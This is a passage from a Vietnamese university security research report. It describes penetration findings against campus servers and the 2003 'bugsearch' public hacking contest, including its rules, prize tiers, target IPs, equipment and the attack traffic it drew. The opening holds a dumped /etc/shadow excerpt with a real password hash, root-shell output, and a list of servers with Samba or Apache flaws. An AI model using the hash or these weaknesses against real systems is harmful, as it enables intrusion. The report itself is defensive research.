rpcuser:!!:12347:0:99999:7::: nfsnobody:!!:12347:0:99999:7::: mailnull:!!:12347:0:99999:7::: smmsp:!!:12347:0:99999:7::: pcap:!!:12347:0:99999:7::: apache:!!:12347:0:99999:7::: webalizer:!!:12347:0:99999:7::: named:!!:12347:0:99999:7::: ldap:!!:12347:0:99999:7::: postgres:!!:12347:0:99999:7::: iportal:$1$Z1vq0nOy$Uu4aNNrqNT1A0zAdRS1O3/:12347:0:99999:7::: [root@itpmo vdchai]# /sbin/ifconfig eth0 Link encap:Ethernet HWaddr 00:06:29:D5:80:0C inet addr:203.162.97.125 Bcast:203.162.97.127 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6940668 errors:0 dropped:0 overruns:0 frame:0 TX packets:5563597 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:2744225979 (2617.0 Mb) TX bytes:2960588810 (2823.4 Mb) Interrupt:27 Base address:0x2000 18. Một số máy chủ khác của ĐH KHTN • Web server khoa Vật lý (lỗi Samba và apache) • Web server khoa Hoá học (lỗi samba) • Mail server Trung tâm tin học (lỗi samba) Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 30 • Mailbox của Trường KHTN: export everyone thư mục mailbox, có thể đọc mail bất kỳ user nào từ một máy ở xa. 4.5 Xây dựng máy chủ Web “an tòan”: thử thách và kết quả. Máy chủ Web an tòan là gì ? đó là một vấn đề mà tất cả chúng ta đều quan tâm. Tuy nhiên, định nghĩa “an tòan” cho máy chủ rất khó lại mang tính chất tương đối vì an tòan ngày hôm nay có thể trở thành không an tòan trong ngày mai. Cùng với Hội đồng xét duyệt đề tài, nhóm triển khai dự án đã thống nhất “máy chủ an tòan là máy chủ mà độ an tòan được đánh giá thông qua số lượng những tấn công thử nghiệm và các phương thức tấn công khác nhau”. Với một định nghĩa “biện chứng “ như vậy, nhóm đề tài cần xây dựng một máy chủ Web và tìm cách lôi cuốn nhiều nhất có thể được số lượng người thử thách độ an toàn của nó. Trên cơ sở kết quả nhận được, qui trình xây dựng máy chủ Web, kinh nghiệm sau khi bị tấn công sẽ có lợi cho các đơn vị muốn triển khai máy chủ Web. Cuộc thi tìm sơ hở trên máy chủ (bugsearch). Trên cơ sở các kinh nghiệm của nhóm dự án từ đề tài nghiên cứu trọng điểm cấp ĐHQG-HCM về an tòan và bảo mật hệ thống thông tin cùng với những kiến thức mới thu nhận, nhóm dự án đã xây dựng một máy chủ Web với tất cả các kiến thức mà nhóm dự án có được. Máy chủ này sử dụng hệ điều hành (HĐH) Linux, một HĐH có nhiều ưu việt sau: • Chi phí phần cứng và phần mềm rẻ. Linux chạy trên PC có cấu hình trung bình và thấp. Hệ điều hành là hòan tòan miễn phí. Rõ ràng giải pháp máy chủ Linux nằm trong khả năng tài chính của hấu hết các doanh nghiệp vừa và nhỏ. • Hiệu năng máy chủ cao. Là một hệ điều hành Unix, Linux sử dụng rất hiệu quả tài nguyên như bộ nhớ, CPU của hệ thống. Với cấu hình mạnh tới 8 CPU của máy tính kiểu Intel cùng HĐH Linux, doanh nghiệp có thể xây dựng các máy chủ mạnh cấp xí nghiệp, đảm bảo sự họat động của tất cả các dịch vụ Internet, dịch vụ lưu trữ dữ liệu. Như vậy, máy chủ Linux đáp ứng được nhu cầu máy chủ từ nhỏ tới khá lớn với giá thành hợp lý. • HĐH Linux cho phép cấu hình mềm dẻo tối đa. Linux có lẽ là HĐH hiếm mà nhóm dự án có kiến thức và khả năng hiệu chỉnh một cách chi tiết nhất. Nhân (kernel) của máy chủ bugsearch được biên dịch lại hòan tòan từ mã nguồn, được hiệu chỉnh để sao cho khả năng tấn công, chiếm quyền điều khiển và cài đặt cửa sau (backdoor) thấp nhất. • Các phần mềm dịch vụ thực hiện trên HĐH Linux rất phong phú, cho phép triển khai hầu hết các dịch vụ cần thiết trên máy chủ, đáp ứng hầu như tất cả các nhu cầu của các doanh nghiệp. Với những phân tích trên, chúng tôi xây dựng máy chủ Web bugsearch với cấu hình sau: - Hệ điều Linux trên máy tính PC - Dịch vụ Web với Apache server Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 31 - Cơ sở dữ liệu Oracle cho Linux Quá trình tổ chức cuộc thi được tổ chức như sau - Ngày 18 tháng 8 năm 2003, máy chủ bugsearch được triển khai và nối Internet từ phòng máy tính của ĐHQG-HCM tại phòng B103 của ĐH KHXH và Nhân văn. Trong giai đọan này, đường truyền kết nối Internet của ĐHQG-HCM được sử dụng để kết nối với máy chủ bugsearch. Cuộc thi gây được sự chú ý lớn của các cơ quan thông tin đại chúng như báo tuổi trẻ, Sàigòn giải phóng, Thanh niên, VNExpress, Tin tức Việt nam… và hưởng ứng của nhiều hacker trẻ. Cấu hình của hệ thống bugsearch đợt thứ nhất chỉ bao gồm 3 máy là 01 máy chủ Web bugserach, 01 Cisco IDS và 01 máy Linux với phần mềm snort triển khai trên đó. Thông báo về cuộc thi cùng thể lệ cuộc thi được hiển thị tại trang chủ của Website bugsearch Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 32 BẠN LÀ HACKER GIỎI HAY MÁY CHỦ BẢO MẬT TỐT ? Nắm vững các kỹ thuật tấn công một hệ thống là những kiến thức vô cùng quan trọng đối với các quản trị viên, đặc biệt là các chuyên viên về bảo mật hệ thống. Phải đã từng là một quản trị viên hệ thống nhiều máy chủ với các dịch vụ trên đó đang bị xâm nhập ta mới hiểu được cảm giác giận dữ, lo lắng, lúng túng không biết bắt đầu từ đâu và làm như thế nào để lọai bỏ kẻ xâm nhập khỏi hệ thống khi mà ta không có quyền cắt kết nối mạng vì phải đảm bảo liên tục dịch vụ trên đó. Kẻ xâm nhập đã vào qua sơ hở nào ? từ lúc nào ? đã chiếm quyền điều khiển máy chủ nào ? máy chủ nào còn an tòan ? liệu các giải pháp sắp áp dụng đã đủ để lọai trừ kẻ xâm nhập chưa ? … là một lọat các câu hỏi cần có đáp số. Với một hệ thống bắt buộc phải họat động liên tục, người quản trị thực không có nhiều ưu thế so với kẻ xâm nhập, và đây là một cuộc đấu trí thực sự giữa admin và hacker. Để chiến thắng, chúng ta phải có sự chuẩn bị nghiêm túc từ trước cho công tác bảo mật. Đó là hệ thống log, hệ thống cơ sở dữ liệu ghi lại trạng thái của hệ thống khi còn “sạch sẽ”, hệ thống phát hiện xâm nhập … và bên cạnh đó, ta phải là người “trên cơ” đối thủ, hiểu được các ngón nghề của những kẻ xâm nhập như nhữngngười xâm nhập hiểu admin. Với mục đích tạo một sân chơi lành mạnh cho phép các bạn tự đánh giá được khả năng hiểu biết của mình về xâm nhập một hệ thống Unix; kiểm tra khả năng phòng thủ một máy chủ Web, nhóm bugsearch xin tổ chức cuộc thi “Tìm sơ hở (bugsearch)”. Nội dung của cuộc thi là thách đố các bạn xâm nhập một máy chủ Web bugsearch.vnuhcm.edu.vn (203.162.44.80) đặt tại mạng tin học của Đại học Quốc gia Thành phố Hồ chí Minh (ĐHQG-HCM). Tùy theo mức độ xâm nhập thực hiện được mà người xâm nhập sẽ nhận được các giải thưởng khác nhau. Qui chế của cuộc thi “Tìm sơ hở - bug searching”như sau: 1/ Đối tượng tham gia cuộc thi “bugsearch” là tất cả các công dân Việt nam. 2/ Không sử dụng các phương thức tấn công kiểu Deny of Service (DoS) và các biến tấu của nó vì các phương thức này sẽ làm ảnh hưởng tới họat động bình thường của mạng ĐHQG-HCM. 3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường của hệ thống, không làm “treo”máy chủ, xóa đĩa cứng... 4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng, trừ giải đặc biệt. Với 2 điều kiện 3 và 4, nếu một bạn thành công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về bạn; tuy nhiên nếu bạn thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ dành cho bạn và giải thưởng mức thấp hơn mà bạn đã đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành “mở” để chờ đón các bạn khác. 5/ Trong qúa trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 33 6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các bạn phải : • Ghi lại tòan bộ các màn hình ghi các lệnh đã thực hiện • Gửi ngay (nếu chậm, có thể có một người khác cũng làm được như bạn) các bằng chứng của cuộc tấn công của mình cho tnminh@vnuhcm.edu.vn. Thời gian nhận được email ghi bởi máy chủ email của ĐHQG sẽ được coi là thời điểm đang ký kết quả dự thi. • Bugsearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các bạn đã làm, kiểm tra các dấu vết các bạn đã để lại trên hệ thống …) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của bạn. 7/ Cuộc thi bắt đầu từ 12h00 ngày 18/8/2003 và chấm dứt khi tất cả các giải đề ra đã được thực hiện hết hoặc vào thời điểm hội thảo về bảo mật hệ thống vào khỏang giữa tháng 9/2003. Đây cũng là thời điểm trao giải thưởng của cuộc thi. 8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức bảo vệ máy chủ. 9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối cùng. Danh sách các giải thưởng: • 1 giải trị giá 500 000 đồng cho ai chiếm được shell quyền một user thông thường trên máy chủ. • 1 giải trị giá 1 triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi. • 1 giải trị giá 1 triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root shell • 1 giải trị giá 1,5 triệu đồng cho ai kiếm được shell quyền root • 1 giải trị giá 2 triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy chủ • 1 giải đặc biệt trị giá 3 triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo và kết thúc cuộc thi, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra tòan hệ thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị mạng không phát hiện được. Chúc các bạn may mắn. Nhóm bugsearch Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 34 Góp ý - liên hệ: gửi thư tới phanhoaian@tintucvietnam.com, Quảng cáo: sales@tintucvietnam.com.vn © Copyright 2000-2003 TintucVietnam.com, all rights reserved. ® Ghi rõ nguồn "TintucVietnam.com" khi bạn phát hành lại thông tin từ website này. 0.063 s CNTT Việt Nam CNTT Thế giới Nhân vật Điểm báo Radio-Itoday | Diễn đàn | Địa chỉ vàng | Tư vấn kỹ thuật | Văn bản pháp lý | News letter Cuộc thi tài hacker công khai đầu tiên tại Việt Nam (08:43:00 25-08-03) Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 35 Hội thảo - triển lãm Trong nước Ngoài nước Dự án Mua gì - Ở đâu Thị trường PC Công nghệ cho PC Tiện ích cho PC Điện thoại - Viễn thông Rao vặt I-Today - Lần đầu tiên tại Việt Nam, một cuộc thi ''hợp pháp'' thử tài các hacker đã được nhóm ''BugSearch'' thuộc Đại học Quốc gia TP.HCM (ĐHQG-HCM) công bố. Nội dung của cuộc thi là thách đố các hacker xâm nhập một máy chủ Web đặt tại mạng tin học của ĐHQG-HCM. Theo nhóm BugSearch, mục đích của cuộc thi là tạo ra một sân chơi lành mạnh cho phép các bạn yêu thích tin học tự đánh giá được khả năng hiểu biết của mình về xâm nhập một hệ thống Unix; kiểm tra khả năng phòng thủ một máy chủ Web. Trong ''lời dẫn'' của mình, nhóm BugSearch viết: ''Phải đã từng là một quản trị viên hệ thống nhiều máy chủ với các dịch vụ trên đó đang bị xâm nhập, ta mới hiểu được cảm giác giận dữ, lo lắng, lúng túng không biết bắt đầu từ đâu và làm như thế nào để loại bỏ kẻ xâm nhập khỏi hệ thống khi mà ta không có quyền cắt kết nối mạng vì phải đảm bảo liên tục dịch vụ trên đó. Kẻ xâm nhập đã vào qua sơ hở nào? Từ lúc nào? Đã chiếm quyền điều khiển máy chủ nào? Máy chủ nào còn an toàn? Liệu các giải pháp sắp áp dụng đã đủ để loại trừ kẻ xâm nhập? Với một hệ thống bắt buộc phải hoạt động liên tục, người quản trị không có nhiều ưu thế so với kẻ xâm nhập, và đây là một cuộc đấu trí thực sự giữa admin và hacker. Để chiến thắng, chúng ta phải có sự chuẩn bị nghiêm túc từ trước cho công tác bảo mật. Đó là hệ thống log, hệ thống cơ sở dữ liệu ghi lại trạng thái của hệ thống khi còn  sạch sẽ , hệ th ống phát hiện xâm nhập và bên cạnh đó, ta phải là người ''trên cơ'' đối thủ, hiểu được các ngón nghề của những kẻ xâm nhập...'' Quy chế của cuộc thi Theo quy định của nhóm BugSearch, những người tham dự cuộc thi phải tuân thủ các điều kiện sau: 1/ Đối tượng tham gia cuộc thi là tất cả các công dân Việt nam. 2/ Không sử dụng các phương thức tấn công kiểu Từ chối Dịch vụ (DoS) và các biến tấu của nó vì các phương thức này sẽ làm ảnh hưởng tới họat động bình thường của mạng ĐHQG-HCM. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 36 Đào tạo CNTT Virus - hacker Phổ biến kiến thức Mẹo lập trình Thư viện sách Thư viện phần mềm Điểm tin Games Thư viện Games Bên lề Công nghệ 3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường của hệ thống, không làm ''treo'' máy chủ, xóa đĩa cứng... 4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng, trừ giải đặc biệt. Với hai điều kiện 3 và 4, nếu một hacker thành công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về anh ta; tuy nhiên nếu anh ta thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ dành cho anh ta và giải thưởng mức thấp hơn mà anh ta đã đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành ''mở'' để chờ đón những người khác. 5/ Trong quá trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế. 6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các hacker phải : - Ghi lại toàn bộ các màn hình ghi các lệnh đã thực hiện - Gửi ngay các bằng chứng của cuộc tấn công của mình cho tnminh@vnuhcm.edu.vn. Thời gian nhận được e-mail ghi bởi máy chủ e-mail của ĐHQG sẽ được coi là thời điểm đang ký kết quả dự thi. - Nhóm BugSearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các hacker đã làm, kiểm tra các dấu vết các hacker đã để lại trên h ệ thống ) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của hacker đó. 7/ Cuộc thi bắt đầu từ 12h00 ngày 18/8/2003 và chấm dứt khi tất cả các Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 37 PC Cười Tìm chính xác Go Tìm mở rộng giải đề ra đã được thực hiện hết hoặc vào thời điểm hội thảo về bảo mật hệ thống vào khoảng giữa tháng 9/2003. Đây cũng là thời điểm trao giải thưởng của cuộc thi. 8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức bảo vệ máy chủ. 9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối cùng. Cơ cấu giải thưởng - 1 giải trị giá 500.000 đồng cho ai chiếm được shell quyền một user thông thường trên máy chủ. - 1 giải trị giá 1 triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi. - 1 giải trị giá 1 triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root shell - 1 giải trị giá 1,5 triệu đồng cho ai kiếm được shell quyền root - 1 giải trị giá 2 triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy chủ - 1 giải đặc biệt trị giá 3 triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo và kết thúc cuộc thi, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra toàn hệ thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 38 Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị mạng không phát hiện được. Đăng Khoa Sobig.F lập kỷ lục về lây nhiễm Microsoft cảnh báo về các lỗ hổng IE nghiêm trọng Sobig.F, biến thể mới nhất của dòng họ Sobig ''Ngựa Tơ roa'' tấn công máy chủ GNU Biến thể MSBlast mới... làm việc thiện? Sâu Blaster đã tràn sang Việt Nam Sâu MSBlaster tấn công Windows, lây lan nhanh chóng Microsoft.com bị ngừng trệ do tấn công DoS Cảnh giác với thủ đoạn ngụy trang của sâu Mimail Các công ty quá chậm trễ trong việc áp dụng các ''miếng vá'' Xem tiếp Bản quyền VASC Orient, Công ty phát triển phần mềm VASC 99 Triệu Việt Vương HN; Tel: (04) 9782235; i-today@vasc.com.vn Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 39 Tuy nhiên, cũng có nhiều nguồn tin cảnh báo khả năng các hacker sẽ tấn công lan sang các máy chủ khác của ĐHQG-HCM mặc dù bugsearch đã được đặt hòan tòan tách biệt với các máy chủ ĐHQG-HCM (đặt tại phòng máy chủ của ĐHQG-HCM tại số 3 Công trường quốc tế và không cùng subnet với bugsearch). Đồng thời, việc quét tìm sơ hở tên máy bugsearch cũng làm ảnh hưởng ít nhiều tới khả năng truy cập của ĐHQG ra Internet (cùng thời điểm này virus tin học lan rất rộng cũng gây nghi ngờ là do cuộc thi bugsearch gây ra). Vì vậy, sau khi tổ chức cuộc thi được một tuần nhóm đề tài đã phải tạm dừng cuộc thi bugsearch vào ngày 25/8/2003. Trong thời gian một tuần diễn ra cuộc thi, chúng tôi ghi nhận được kết quả là đã có 49333 lượt truy cập vào Website bugsearch. Đặc biệt trong đó có tới 5805 lượt truy cập với mục đích tìm các khai thác sơ hở của Web server. Các truy cập này thường có các nội dung “kỳ lạ” như chuỗi dài các ký tự aaaa,xxxx,./././,passwd,cgi-bin, hay chuỗi số nhị phân không hiển thị được trên màn hình - Từ ngày 26/9/2003 đến 17/10/2003 và rồi kéo dài tới 22/10/2003, nhóm dự án lại tiếp tục mở cuộc thi bugsearch với sự tài trợ của Công ty Viễn thông quân đội Vietel, Trung tâm đào tạo SaigonCTT, Cisco Việtnam, HPT. Đây là sự hỗ trợ cụ thể và vô cùng quý báu của các đơn vị để nhóm dự án có thể tiếp tục tổ chức cuộc thi và thử thách cấu hình máy chủ cũng như kiến thức của mình. - Trong lần thử nghiệm thứ hai, nhóm nghiên cứu sử dụng tất cả 10 thiết bị khác nhau bao gồm một router serie 2600, hai switches làm 2 mạng riêng biệt, một máy PC làm Web server (máy này được cài lại mới), một PC với chương trình snort, một Cisco IDS (US$7295), một Sun Enterprise 4500 2 cards mạng với phần mềm ISS, một HP-UX server (của Công ty HPT) làm log server cho Web bugsearch, một máy PC windows XP làm Cisco IDS console và snort monitor, một PC WindowsNT làm ISS console. Các thiết bị này được SaigonCTT và Cisco Việtnam tài trợ miễn phí cho cuộc thi. - Một đường truyền kết nối Internet qua leased line tốc độ 64 Kbps do Vietel tài trợ miễn phí. - Trung tâm SaigonCTT tăng thêm 2 triệu đồng cho giải đặc biệt. - Cấu hình của bugsearch lần thứ 2 được miêu tả theo sơ đồ sau: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 40 Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 41 Trong sơ đồ này, Cisco router nhận đường truyền E 1 từ Vietel và làm nhiệm vụ sẵn sàng chống lại các cuộc tấn công dạng từ chối dịch vụ (DoS, DDoS). Phương thức cấu hình chi tiết của máy chủ này được miêu tả chi tiết trong phụ lục A. Web server bugsearch nhóm đề tài triển khai Linux kernel 2.4.22 đã biên dịch lại cùng với RedHat Linux 8.0. Hiệu chỉnh lại hệ thống trên Web bugseach để chống lại các cuộc tấn công nhằm lấy quyền kiểm soát máy (root) là công việc trọng tâm của nhóm nghiên cứu. Các phần mềm dịch vụ được triển khai là Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 42 Cơ sở dữ liệu Oracle 8.1.7.0.0 Enterprise Edition for Linux với Patch Set Version 8.1.7.3.0 ; Jakarta Tomcat 4.1.27 cho application server cùng với một ứng dụng ghi nhận đang ký của người sử dụng; Apache 2.0.47 cho Web server; OpenSSH 3.17 để làm việc từ xa; Bind 9.2.1-1.7x cho dịch vụ DNS. Máy HP-UX làm nhiệm vụ lưu log từ bugsearch. Việc triển khai máy log ngòai là để trong trường hợp người tham gia cuộc thi không tôn trọng điều lệ thi xóa đĩa cứng máy chủ thì nhóm đề tài vẫn lưu được họat động của người dự thi. Tiện ích Snort được triển khai trên một máy PC với HĐH Linux; Tiện ích Internet Security System được triển khai trên máy Sun Enterprise 4500 với 3 card mạng Thiết bị Cisco IDS chuyên dụng được kết nối trực tiếp vào mạng. Cả 3 tiện ích IDS đều nhằm mục tiêu phát hiện ra các cuộc tấn công, xâm nhập nhằm vào bugsearch. Thông báo tiếp tục cuộc thi được đang tải trên echip, vnexpress … Nội dung của thông báo nối lại cuộc thi là Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 43 THI TÌM SƠ HỞ “BUGSEARCH” Thân chào các bạn, Được sự ủng hộ của một số đơn vị và cá nhân, chúng tôi vui mừng thông báo tới các bạn rằng cuộc thi “bugsearch” được tiếp tục với một kết nối Internet 64Kbps hoàn toàn dành riêng cho cuộc thi này. Địa chỉ máy chủ đích cần thực hiện xâm nhập là 203.113.143.170. Điều lệ của cuộc thi không có gì thay đổi về căn bản. Chúng tôi chỉ xin được làm rõ hơn một số chi tiết sau: - đây là một họat động nghiên cứu phi lợi nhuận. - hai mục đích chính của cuộc thi là tạo diều kiện cho các bạn quan tâm vấn đề bảo mật hệ thống có được một sân chơi lành mạnh và thử nghiệm khả năng chống lại các cuộc xâm nhập một phương thức cấu hình máy chủ. - sau cuộc thi, cấu trúc toàn bộ hệ thống máy chủ bugsearch và các thiết bị bảo vệ khác cùng tất cả các cấu hình của chúng sẽ được công bố công khai và cung cấp miễn phí cho tất cả những ai quan tâm. - Hệ thống các dịch vụ của máy chủ đích sẽ chỉ được tăng thêm (không giảm đi) trong suốt thời gian cuộc thi. - Nếu một sơ hở của máy chủ do người thi phát hiện và đã thông báo bằng email tới ban tổ chức cuộc thi thì nhóm quản trị máy chủ không được “vá’ lỗi này trong suốt thời gian cuộc thi vì nhóm quản trị chỉ được “vá” các lỗi do tự mình phát hiện ra. Nhóm nghiên cứu xin chân thành cảm ơn các nhà tài trợ và các bạn tham gia cuộc thi này. Chúc các bạn một cuộc thi hào hứng, Nhóm bugsearch Qui chế của cuộc thi “Tìm sơ hở - bugsearch” đã hiệu chỉnh: 1/ Đối tượng tham gia cuộc thi “bugsearch” là tất cả các công dân Việt nam. 2/ Không sử dụng các phương thức tấn công kiểu Deny of Service (DoS) và các biến tấu của nó. 3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường của hệ thống, không làm “treo”máy chủ, xóa đĩa cứng... 4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng, trừ giải đặc biệt. Với hai điều kiện 3 và 4, nếu một bạn thành công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về bạn; tuy nhiên nếu bạn thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ dành cho bạn và giải thưởng mức thấp hơn mà bạn đã đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành “mở” để chờ đón các bạn khác. 5/ Trong qúa trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế, nhưng chỉ được “vá” các lỗi do chính mình tìm ra. 6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các bạn phải : Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 44 • Ghi lại tòan bộ các màn hình ghi các lệnh đã thực hiện • Gửi ngay (nếu chậm, có thể có một người khác cũng làm được như bạn) các bằng chứng của cuộc tấn công của mình tới bugsearch@hcm.vnn.vn (hoặc địa chỉ dự phòng bugsearchvn@yahoo.com). Thời gian nhận được email ghi bởi máy chủ email sẽ được coi là thời điểm đang ký kết quả dự thi. • Admin của Bugsearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các bạn đã làm và/hoặc kiểm tra các dấu vết các bạn đã để lại trên hệ thống …) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của bạn. Nhóm bảo vệ không được quyền “vá” sơ hở mà bạn tìm ra. 7/ Cuộc thi bắt đầu từ 12h00 ngày 26/9/2003 và chấm dứt khi tất cả các giải đề ra đã được thực hiện hết hoặc tới 12h00 ngày 17/10/2003. Thời điểm trao giải thưởng của cuộc thi sẽ cùng với hội thảo về bảo mật hệ thống sẽ được tổ chức sau đó. 8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức bảo vệ máy chủ. 9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối cùng. Danh sách các giải thưởng: • 1 giải trị giá 500 000 (năm trăm ngàn) đồng cho ai chiếm được shell quyền một user thông thường trên máy chủ. • 1 giải trị giá 1 (một) triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi. • 1 giải trị giá 1 (một) triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root shell • 1 giải trị giá 1,5 (một phẩy năm) triệu đồng cho ai kiếm được shell quyền root • 1 giải trị giá 2 (hai) triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy chủ • 1 giải đặc biệt trị giá 5 (năm) triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra tòan hệ thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị mạng không phát hiện được. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 45 MỘT SỐ THAY ĐỔI ĐỐI VỚI THỂ LỆ NỘP BÀI THI TÌM SƠ HỞ “BUGSEARCH” Thân chào các bạn, Nhận được một số phản ánh của một số bạn yêu thích tìm hiểu về bảo mật hệ thống, Ban tổ chức cuộc thi bugsearch xin có một số thay đổi “thoáng hơn” về phương thức nộp bài thi như sau: 1/ Để nộp bài thi, các bạn gửi về ban tổ chức theo địa chỉ bugsearch@hcm.vnn.vn bằng chứng cho phép chứng tỏ việc xâm nhập thành công của các bạn. Hình thức trình bày bằng chứng này hòan tòan theo ý của các bạn và chỉ cần đủ rõ để Ban tổ chức có thể xác định được kết quả, 